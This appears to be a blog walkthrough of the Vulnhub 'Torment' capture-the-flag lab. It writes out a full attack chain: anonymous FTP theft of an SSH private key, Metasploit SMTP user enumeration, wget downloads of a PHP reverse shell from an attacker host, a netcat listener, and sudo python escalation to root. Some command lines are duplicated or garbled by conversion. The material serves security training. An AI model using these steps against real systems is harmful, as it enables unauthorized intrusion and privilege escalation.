You are on page 1of 24

digitalworld.

local:Torment Vulnhub
Walkthrough
posted inCTF Challenges on August 5, 2019 by Raj Chandel
SHARE

In this Article, we are going to take a new challenge Torment, which is a lab of the series
digitalworld. The credit for making this VM machine goes to “Donavan” and it’s another
boot2root challenge where we have to root the server and capture the flag to complete the
challenge. You can download this VM here.

Security Level: Intermediate

Penetrating Methodology:

1. Scanning

 Netdiscover
 NMAP

2. Enumeration

 FTP
 HexChat
 ssh

3. Exploitation

 Metasploit
 Netcat

4. Privilege Escalation

 Exploiting Sudo rights

Walkthrough:

Scanning:

Let’s start off by scanning the network and identifying the host IP address. We can identify
our host IP as 192.168.1.105 by using Netdiscover.

netdiscover
1 netdiscover

Then, as usual, we used our favourite tool Nmap for port enumeration. We found that there
are so many ports open on the target machine.

We have ports like 21, 22 open.

nmap -A 192.168.1.105

1 nmap -A 192.168.1.105
Other important ports open on the system are 25, 80, 445, 631, 2049 and 6667.
Enumeration:

As we can see port 21 is open with Anonymous login enabled. So we logged into the system
and found there are multiple directories but ngircd and .ssh caught our attention.
ngircd is a free, portable and lightweight Internet Relay Chat server for small or private
networks. .ssh is a directory which holds the id_rsa_keys for SSH authentication.

ftp 192.168.1.105
ls -la

1 ftp 192.168.1.105
2 ls -la
We looked inside the .ngircd directory and there was a file named channels, we downloaded
the file into our kali system.

Likewise, we downloaded id_rsa file from the .ssh directory.

cd .ngircd
ls
get channels
cd .ssh

1 cd .ngircd
2 ls
3 get channels
4 cd .ssh
5 get id_rsa

We looked inside the channels directory and found two channels named games &
tormentedprinter.
We also looked inside the id_rsa file and got a private key which could be used for SSH login
into the target system.

cat channels
cat id_rsa

1 cat channels
2 cat id_rsa

As already explained above that there is ngircd chat service running. We tried to access the
target system using HexChat.
We entered the target host IP address but we don’t have the password to login.
So what we did is we installed the ngircd on our kali system only to look for the default
password of ngircd chat service.

In the /etc/ngircd file we looked for the default credentials.


We got a password wealllikedebian.

We used the default password in our HexChat messenger to connect to the target machine.
After connecting, it asked to join the channel and if you remember we have already two-
channel names games & tormentedprinter with us. We used both and the later had some
important information for us.
After logging in we found a password
mostmachineshaveasupersecurekeyandalongpassphrasell which we may be used later.
There is a CUPS 2.2.1 service running on port 661 and can be access through http-method as
shown by the nmap scan.

We tried to access the same port in the browser.


Looking here and there in search of some info. In printers tab, we got some names which we
though can be used to form a username list.
We created a users file in which we copied all the names found above.
Exploitation:

From the nmap scan, you might have observed that there is Postfix SMTP service running on
port 25. We looked for its exploit and its vulnerable to use bruteforcing.

We passed in the above-created users file for brute-forcing and found two legitimate users
Patrick, Qiu.

use auxiliary/scanner/smtp/smtp
set rhosts 192.168.1.105
set user_file /root/users
exploit

1 use auxiliary/scanner/smtp/smtp_enum
2 set rhosts 192.168.1.105
3 set user_file /root/users
4 exploit

So we have a username and a private ssh key which we can use to log in to the target system.
We logged into the system with user Patrick and checked for the sudoer’s list but didn’t find
any such binary which can lead us to privilege escalation.

chmod 600 id_rsa


ssh -i id_rsa patrick@192.168.1
sudo -l

1 chmod 600 id_rsa


2 ssh -i id_rsa patrick@192.168.1.105
3 sudo -l

So to further enumerate we thought of using LinEnum.sh, so we downloaded the


LinEnum.sh on the target machine using wget command.

But unfortunately couldn’t find anything useful.

cd /tmp
w get http://192.168.1.106:8000
chmod 777 LinEnum.sh
./LinEnum.sh

1 cd /tmp
2 wget http://192.168.1.106:8000/LinEnum.sh
3 chmod 777 LinEnum.sh
4 ./LinEnum.sh
Privilege Escalation:

So after a lot of enumeration and scratching here and there we found that the apache2.conf of
the apache service has read write and execute permissions for all the users.

So what we did is we tried to edit the same file.

ls -la /etc/apache2/apache2.con
nano /etc/apache2/apache2.con

1 ls -la /etc/apache2/apache2.conf
2 nano /etc/apache2/apache2.conf
We added a user qiu and group qiu inside the /etc/apache2/apache2.conf so that we will
leverage it for privilege escalation. So the idea is when we restart the apache service it will get
executed with qiu user privileges.

Parallelly we grabbed a php-reverse-shell from /usr/share/webshells/php and modified the


listener IP as ours and named it as shell.php.

cd /usr/share/w ebshells/php
ls -la
cp php-reverse-shell.php /root/s
nano shell.php

1 cd /usr/share/webshells/php
2 ls -la
3 cp php-reverse-shell.php /root/shell.php
4 nano shell.php
We edited the listener’s IP as ours.
Then downloaded the shell into /var/www/html folder so that we can access it through
browser.

To make the apache service run as qiu user we have to restart the apache service but we don’t
have the privileges to do so, but at the same time, we can reboot the target system as reboot
command can be executed as sudoer for the user Patrick.

cd /var/w w w /html
w get http://192.168.1.106:8000
sudo /bin/systemctl reboot

1 cd /var/www/html
2 wget http://192.168.1.106:8000/shell.php
3 sudo /bin/systemctl reboot

After reboot is complete we just executed the shell.php script in the browser and at the same
time started a netcat listener on our kali.

After some time we got a reverse netcat shell on our kali system of user qiu.

To elevate to the root shell we checked for the sudoer list and found that python can be run
with root privileges without any password. So after executing the python one liner /bin/bash
script with sudo permissions we successfully got the root shell.

nc -lvp 1234
python -c 'import pty;pty.spaw n
sudo -l
sudo python -c 'import pty;pty.s
1 nc -lvp 1234
2 python -c 'import pty;pty.spawn("/bin/bash")'
3 sudo -l
4 sudo python -c 'import pty;pty.spawn("/bin/bash")'
5 id

Once you have got the root shell get the root flag is like a cakewalk which we eventually did
and got the two flags proof.txt and author-secret.txt.

ls
cat proof.txt
cat author-secret.txt

1 ls
2 cat proof.txt
3 cat author-secret.txt
Author: Auqib Wani is a Certified Ethical Hacker, Penetration Tester and a Tech Enthusiast
with more than 5 years of experience in the field of Network & Cyber Security. Contact Here

https://www.vulnhub.com/entry/digitalworldlocal-torment,299/

You might also like